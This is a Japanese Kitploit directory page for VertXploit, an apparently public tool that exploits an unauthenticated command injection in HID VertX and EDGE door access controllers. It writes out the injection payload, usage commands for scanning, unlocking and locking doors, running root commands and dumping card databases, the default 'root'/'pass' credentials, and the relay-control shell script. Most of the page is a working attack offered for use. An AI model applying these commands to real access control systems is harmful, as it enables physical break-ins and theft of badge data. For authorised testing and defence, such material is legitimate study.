Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
VertXploit — HID VertX および EDGE アクセス制御システムの悪用 | Kitploit
ツール/GitHubGitHub/coldfusion39/vertxploit
ネットワークマッピング脆弱性分析エクスプロイト情報収集ポストエクスプロイトハードウェアとIoTセキュリティ
GitHubcoldfusion39/vertxploit

VertXploit

HID VertX および EDGE アクセス制御システムの悪用

リポジトリを見る
25109年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

VertXploit

HID VertX および EDGE アクセス制御システムを悪用するためのツール

概要

VertXploit は、HID VertX および EDGE アクセス制御システムを悪用するために使用できるツールです。

discoveryd サービスには、システムコールを実行する前にユーザーデータをサニタイズしない脆弱性があります。これにより、認証を必要とせずに HID VertX および EDGE アクセス制御システム上で任意のコードを実行できます。詳細については、コマンドインジェクション のセクションを参照してください。

VertXploit は、アクセス制御システムに接続されたドアの解錠または施錠、プロビジョニング/キャッシュされたすべてのアクセス制御カードを含むデータベースのダウンロード、および脆弱性がある場合には VertX システム上で root として任意のコマンドの実行を行うことができます。

VertX コントローラのファームウェアが最近更新されている場合、vertXploit はデフォルトまたはユーザー指定のユーザー名とパスワードを使用して、Web コンソール経由でドアの解錠または施錠を試みます。

要件

必要な Python モジュールをインストールするには、pip install -r requirements.txt を実行してください。

  • python-nmap
  • requests
  • tabulate

VertXploit の使い方

ヘルプメニューを表示するには ./vertXploit.py -h を、特定のアクションのヘルプを表示するには ./vertXploit.py ACTION -h を実行してください。

発見

vertXploit を discover アクション引数だけで実行すると、ローカルブロードキャストネットワーク上のすべての HID アクセス制御システムを発見します。オプションの --ip IP 引数で IP アドレスを指定した場合、vertXploit は python-nmap を使用して、その /24 ネットワーク範囲内でポート 4050 が開いているシステムをスキャンします。その後、vertXploit は特定された IP アドレスに discovery UDP パケットを送信し、そのシステムが HID アクセス制御パネルかどうかを判断します。

例:

./vertXploit.py discover

./vertXploit.py discover --ip 10.1.10.5

フィンガープリント

コントローラが発見されたら、vertXploit を fingerprint アクション引数とアクセスコントローラの IP アドレスを指定して実行すると、アクセス制御パネルに関する詳細情報が返されます。

例:

./vertXploit.py fingerprint 10.1.10.5

解錠/施錠

アクセス制御パネルに接続されたドアを解錠または施錠するには、vertXploit を unlock または lock アクション引数とコントローラの IP アドレスを指定して実行します。コントローラがコマンドインジェクションの脆弱性の影響を受けない場合、vertXploit は Web コンソール経由でドアの解錠または施錠を試みます。この方法ではデフォルトのユーザー名 'root' とデフォルトのパスワード 'pass' が使用されます。あるいは、--username USERNAME および --password PASSWORD 引数で独自のものを指定できます。

例:

./vertXploit.py unlock 10.1.10.5

./vertXploit.py unlock 10.1.10.5 --username test --password test

Raw

raw アクション引数とコントローラの IP アドレスを使用することで、アクセス制御システム上で任意の Linux コマンドを実行できます。コマンドがコントローラにインストールされていない場合(Python、Perl、Ruby など)、実行に失敗する可能性があります。簡単な概念実証として、ネイティブ Linux の 'ping' コマンドは、テストしたすべての VertX および EDGE モデルで動作するようです。

例:

./vertXploit.py raw 10.1.10.5 'ping -c 5 10.1.10.39'

ダウンロード

コントローラのカードデータベースをダウンロードするには、vertXploit を download アクション引数とコントローラの IP アドレスを指定して実行します。コントローラはコマンドインジェクションの脆弱性に対して影響を受ける必要があり、2 つのカードデータベースをダウンロードするにはコントローラの Web インターフェイスにアクセスできる必要があります。Web 認証にはデフォルトのユーザー名 'root' とデフォルトのパスワード 'pass' が使用されます。あるいは、--username USERNAME および --password PASSWORD 引数で独自のものを指定できます。

例:

./vertXploit.py download 10.1.10.5

./vertXploit.py download 10.1.10.5 --username test --password test

ダンプ

コントローラから 'IdentDB' および 'AccessDB' データベースをダウンロードした後、dump アクション引数を使用してデータベースの内容をダンプします。オプションで、--path PATH 引数を使用してデータベースのローカルファイルパスを指定できます。

例:

./vertXploit.py dump

./vertXploit.py dump --path /root/VertX/DBs/

コマンドインジェクション

通常、複数の VertX または EDGE アクセスコントローラがまとめて設置されています。診断コマンド command_blink_on を特定のコントローラに送信すると、パネルの物理的な "Comm" LED が視覚的に識別できるよう点滅します。このコマンドは通常、LED が点滅する回数で終了します。次の例では 30 回です。

command_blink_on;044;00:11:22:33:44:55;30;

点滅回数をバックティックで囲んだ Linux コマンドに置き換えると、そのコマンドがアクセスコントローラ上で root として実行されます。

command_blink_on;044;00:11:22:33:44:55;`ping -c 5 10.1.10.39`;

アクセス制御システムに接続されたドアをリモートで解錠および施錠するために、コマンドが /tmp/a にエコーされます。これは、コントローラに送信できる文字数が 2 つのバックティックを除いて 41 文字に制限されているためです。注: 一部の古い VertX コントローラは printf を含まない BusyBox < 1.0.1 で動作しているため、printf の代わりに echo が使用されます。

ファイルへのコマンドのエコーによる改行は、tr -d '\n' < /tmp/a > /tmp/b を実行して削除され、意図的な改行は tr '!' '\n' < /tmp/b > /tmp/a を実行して挿入されます。

次に、スクリプト /tmp/a が実行され、両方のファイルが削除されます。以下は、unlock および lock コマンドが VertX コントローラに送信されたときに /tmp/a にエコーされるコマンドを示しています。

解錠

root@kitploit:~
# Set QUERY_STRING to the door unlock value
export QUERY_STRING="?ID=0&BoardType=VXXX&Description=Strike&Relay=1&Action=1"

# Run 'diagnostics_execute.cgi' script
/mnt/apps/web/cgi-bin/diagnostics_execute.cgi

# Remove executable permissions to prevent the door from locking
chmod -x /mnt/apps/web/cgi-bin/diagnostics_execute.cgi

施錠

root@kitploit:~
# Enable executable permissions
chmod +x /mnt/apps/web/cgi-bin/diagnostics_execute.cgi

# Set QUERY_STRING to the door lock value
export QUERY_STRING="?ID=0&BoardType=VXXX&Description=Strike&Relay=1&Action=0"

# Run 'diagnostics_execute.cgi' script
/mnt/apps/web/cgi-bin/diagnostics_execute.cgi

リソース

  • HeadlessZeke - コマンドインジェクションの脆弱性
  • ZDI - 公開情報
  • TrendMicro Blog - コマンドインジェクションの脆弱性に関するブログ
  • Brad Antoniewicz - VertX キャッシュからのカード番号の解析
  • Other Work - VertX 発見コマンド
ツールをダウンロード